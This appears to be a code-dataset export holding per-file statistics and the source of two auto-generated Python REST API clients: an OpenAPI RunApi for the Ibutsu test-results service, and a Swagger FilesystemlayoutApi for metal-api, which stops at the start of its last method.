| 0.661538
| 0
| 0.019595
| 0.187885
| 1,948
| 39
| 223
| 49.948718
| 0.761062
| 0.023101
| 0
| 0.515152
| 1
| 0
| 0.271962
| 0.149921
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.393939
| 0
| 0.484848
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
b8f559ee80a214300a016d11ff8ed8c7049745f1
| 22,650
|
py
|
Python
|
ibutsu_client/api/run_api.py
|
ibutsu/ibutsu-client-python
|
8cd34d7fc8f9a2225195ae375a17200b992dde01
|
[
"MIT"
] | 3
|
2020-07-02T14:48:08.000Z
|
2021-11-27T14:06:33.000Z
|
ibutsu_client/api/run_api.py
|
ibutsu/ibutsu-client-python
|
8cd34d7fc8f9a2225195ae375a17200b992dde01
|
[
"MIT"
] | 6
|
2020-07-07T16:13:37.000Z
|
2021-11-10T17:02:59.000Z
|
ibutsu_client/api/run_api.py
|
ibutsu/ibutsu-client-python
|
8cd34d7fc8f9a2225195ae375a17200b992dde01
|
[
"MIT"
] | 5
|
2020-07-02T18:13:03.000Z
|
2021-11-03T09:21:11.000Z
|
"""
Ibutsu API
A system to store and query test results # noqa: E501
The version of the OpenAPI document: 1.13.4
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from ibutsu_client.api_client import ApiClient, Endpoint as _Endpoint
from ibutsu_client.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from ibutsu_client.model.run import Run
from ibutsu_client.model.run_list import RunList
from ibutsu_client.model.update_run import UpdateRun
class RunApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
self.add_run_endpoint = _Endpoint(
settings={
'response_type': (Run,),
'auth': [
'jwt'
],
'endpoint_path': '/run',
'operation_id': 'add_run',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'run',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'run':
(Run,),
},
'attribute_map': {
},
'location_map': {
'run': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.bulk_update_endpoint = _Endpoint(
settings={
'response_type': (RunList,),
'auth': [
'jwt'
],
'endpoint_path': '/runs/bulk-update',
'operation_id': 'bulk_update',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'update_run',
'filter',
'page_size',
],
'required': [
'update_run',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'update_run':
(UpdateRun,),
'filter':
([str],),
'page_size':
(int,),
},
'attribute_map': {
'filter': 'filter',
'page_size': 'pageSize',
},
'location_map': {
'update_run': 'body',
'filter': 'query',
'page_size': 'query',
},
'collection_format_map': {
'filter': 'multi',
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.get_run_endpoint = _Endpoint(
settings={
'response_type': (Run,),
'auth': [
'jwt'
],
'endpoint_path': '/run/{id}',
'operation_id': 'get_run',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'id',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(str,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_run_list_endpoint = _Endpoint(
settings={
'response_type': (RunList,),
'auth': [
'jwt'
],
'endpoint_path': '/run',
'operation_id': 'get_run_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'estimate',
'page',
'page_size',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'filter':
([str],),
'estimate':
(bool,),
'page':
(int,),
'page_size':
(int,),
},
'attribute_map': {
'filter': 'filter',
'estimate': 'estimate',
'page': 'page',
'page_size': 'pageSize',
},
'location_map': {
'filter': 'query',
'estimate': 'query',
'page': 'query',
'page_size': 'query',
},
'collection_format_map': {
'filter': 'multi',
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.update_run_endpoint = _Endpoint(
settings={
'response_type': (Run,),
'auth': [
'jwt'
],
'endpoint_path': '/run/{id}',
'operation_id': 'update_run',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'id',
'run',
],
'required': [
'id',
'run',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(str,),
'run':
(Run,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
'run': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
def add_run(
self,
**kwargs
):
"""Create a run # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_run(async_req=True)
>>> result = thread.get()
Keyword Args:
run (Run): Run item. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Run
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.add_run_endpoint.call_with_http_info(**kwargs)
def bulk_update(
self,
update_run,
**kwargs
):
"""Update multiple runs with common metadata # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bulk_update(update_run, async_req=True)
>>> result = thread.get()
Args:
update_run (UpdateRun): The metadata to add to the test runs
Keyword Args:
filter ([str]): Fields to filter by. [optional]
page_size (int): Set the number of items per page, defaults to 25. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
RunList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['update_run'] = \
update_run
return self.bulk_update_endpoint.call_with_http_info(**kwargs)
def get_run(
self,
id,
**kwargs
):
"""Get a single run by ID (uuid required) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_run(id, async_req=True)
>>> result = thread.get()
Args:
id (str): ID of test run
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Run
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
return self.get_run_endpoint.call_with_http_info(**kwargs)
def get_run_list(
self,
**kwargs
):
"""Get a list of the test runs # noqa: E501
The `filter` parameter takes a list of filters to apply in the form of: {name}{operator}{value} where: - `name` is any valid column in the database - `operator` is one of `=`, `!`, `>`, `<`, `)`, `(`, `~`, `*` - `value` is what you want to filter by Operators are simple correspondents to MongoDB's query selectors: - `=` becomes `$eq` - `!` becomes `$ne` - `>` becomes `$gt` - `<` becomes `$lt` - `)` becomes `$gte` - `(` becomes `$lte` - `~` becomes `$regex` - `*` becomes `$in` - `@` becomes `$exists` Notes: - For the `$exists` operator, \"true\", \"t\", \"yes\", \"y\" and `1` will all be considered true, all other values are considered false. Example queries: /run?filter=metadata.jenkins.job_name=jenkins_job /run?filter=summary.failures>0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_run_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter ([str]): Fields to filter by. [optional]
estimate (bool): Return an estimated count. [optional]
page (int): Set the page of items to return, defaults to 1. [optional]
page_size (int): Set the number of items per page, defaults to 25. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
RunList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.get_run_list_endpoint.call_with_http_info(**kwargs)
def update_run(
self,
id,
run,
**kwargs
):
"""Update a single run # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_run(id, run, async_req=True)
>>> result = thread.get()
Args:
id (str): ID of the test run
run (Run): The updated test run
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Run
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
kwargs['run'] = \
run
return self.update_run_endpoint.call_with_http_info(**kwargs)
| 34.580153
| 819
| 0.4683
| 2,085
| 22,650
| 4.870024
| 0.117506
| 0.032795
| 0.025606
| 0.026591
| 0.812192
| 0.798602
| 0.795942
| 0.778905
| 0.74414
| 0.72858
| 0
| 0.003619
| 0.438764
| 22,650
| 654
| 820
| 34.633028
| 0.795154
| 0.373289
| 0
| 0.651481
| 1
| 0
| 0.210178
| 0.025327
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013667
| false
| 0
| 0.015945
| 0
| 0.04328
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b8f5f93e29db7d1d7dcd402aeed83092a8cdd935
| 27,417
|
py
|
Python
|
metal_python/api/filesystemlayout_api.py
|
metal-stack/metal-python
|
cdf40fa86d2b2944f9818cef1c6723b1eecc506e
|
[
"MIT"
] | 7
|
2020-12-21T05:24:24.000Z
|
2022-02-12T20:55:32.000Z
|
metal_python/api/filesystemlayout_api.py
|
metal-stack/metal-python
|
cdf40fa86d2b2944f9818cef1c6723b1eecc506e
|
[
"MIT"
] | 6
|
2020-09-16T07:23:34.000Z
|
2022-01-18T12:05:30.000Z
|
metal_python/api/filesystemlayout_api.py
|
metal-stack/metal-python
|
cdf40fa86d2b2944f9818cef1c6723b1eecc506e
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
metal-api
API to manage and control plane resources like machines, switches, operating system images, machine sizes, networks, IP addresses and more # noqa: E501
OpenAPI spec version: v0.15.7
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from metal_python.api_client import ApiClient
class FilesystemlayoutApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_filesystem_layout(self, body, **kwargs): # noqa: E501
"""create a filesystemlayout. if the given ID already exists a conflict is returned # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_filesystem_layout(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param V1FilesystemLayoutCreateRequest body: (required)
:return: V1FilesystemLayoutResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_filesystem_layout_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.create_filesystem_layout_with_http_info(body, **kwargs) # noqa: E501
return data
def create_filesystem_layout_with_http_info(self, body, **kwargs): # noqa: E501
"""create a filesystemlayout. if the given ID already exists a conflict is returned # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_filesystem_layout_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param V1FilesystemLayoutCreateRequest body: (required)
:return: V1FilesystemLayoutResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_filesystem_layout" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_filesystem_layout`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['HMAC', 'jwt'] # noqa: E501
return self.api_client.call_api(
'/v1/filesystemlayout', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1FilesystemLayoutResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_filesystem_layout(self, id, **kwargs): # noqa: E501
"""deletes an filesystemlayout and returns the deleted entity # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_filesystem_layout(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: identifier of the filesystemlayout (required)
:return: V1FilesystemLayoutResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_filesystem_layout_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_filesystem_layout_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_filesystem_layout_with_http_info(self, id, **kwargs): # noqa: E501
"""deletes an filesystemlayout and returns the deleted entity # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_filesystem_layout_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: identifier of the filesystemlayout (required)
:return: V1FilesystemLayoutResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_filesystem_layout" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `delete_filesystem_layout`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['HMAC', 'jwt'] # noqa: E501
return self.api_client.call_api(
'/v1/filesystemlayout/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1FilesystemLayoutResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_filesystem_layout(self, id, **kwargs): # noqa: E501
"""get filesystemlayout by id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_filesystem_layout(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: identifier of the filesystemlayout (required)
:return: V1FilesystemLayoutResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_filesystem_layout_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_filesystem_layout_with_http_info(id, **kwargs) # noqa: E501
return data
def get_filesystem_layout_with_http_info(self, id, **kwargs): # noqa: E501
"""get filesystemlayout by id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_filesystem_layout_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: identifier of the filesystemlayout (required)
:return: V1FilesystemLayoutResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_filesystem_layout" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_filesystem_layout`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['HMAC', 'jwt'] # noqa: E501
return self.api_client.call_api(
'/v1/filesystemlayout/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1FilesystemLayoutResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_filesystem_layouts(self, **kwargs): # noqa: E501
"""get all filesystemlayouts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_filesystem_layouts(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[V1FilesystemLayoutResponse]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_filesystem_layouts_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_filesystem_layouts_with_http_info(**kwargs) # noqa: E501
return data
def list_filesystem_layouts_with_http_info(self, **kwargs): # noqa: E501
"""get all filesystemlayouts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_filesystem_layouts_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[V1FilesystemLayoutResponse]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_filesystem_layouts" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['HMAC', 'jwt'] # noqa: E501
return self.api_client.call_api(
'/v1/filesystemlayout', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[V1FilesystemLayoutResponse]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def match_filesystem_layout(self, body, **kwargs): # noqa: E501
"""check if the given machine id satisfies the disk requirements of the filesystemlayout in question # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.match_filesystem_layout(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param V1FilesystemLayoutMatchRequest body: (required)
:return: V1FilesystemLayoutResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.match_filesystem_layout_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.match_filesystem_layout_with_http_info(body, **kwargs) # noqa: E501
return data
def match_filesystem_layout_with_http_info(self, body, **kwargs): # noqa: E501
"""check if the given machine id satisfies the disk requirements of the filesystemlayout in question # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.match_filesystem_layout_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param V1FilesystemLayoutMatchRequest body: (required)
:return: V1FilesystemLayoutResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method match_filesystem_layout" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `match_filesystem_layout`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['HMAC', 'jwt'] # noqa: E501
return self.api_client.call_api(
'/v1/filesystemlayout/matches', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1FilesystemLayoutResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def try_filesystem_layout(self, body, **kwargs): # noqa: E501
"""try to detect a filesystemlayout based on given size and image. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.try_filesystem_layout(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param V1FilesystemLayoutTryRequest body: (required)
:return: V1FilesystemLayoutResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.try_filesystem_layout_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.try_filesystem_layout_with_http_info(body, **kwargs) # noqa: E501
return data
def try_filesystem_layout_with_http_info(self, body, **kwargs): # noqa: E501
"""try to detect a filesystemlayout based on given size and image. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.try_filesystem_layout_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param V1FilesystemLayoutTryRequest body: (required)
:return: V1FilesystemLayoutResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method try_filesystem_layout" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `try_filesystem_layout`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['HMAC', 'jwt'] # noqa: E501
return self.api_client.call_api(
'/v1/filesystemlayout/try', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1FilesystemLayoutResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_filesystem_layout(self, body, **kwargs): # noqa: E501
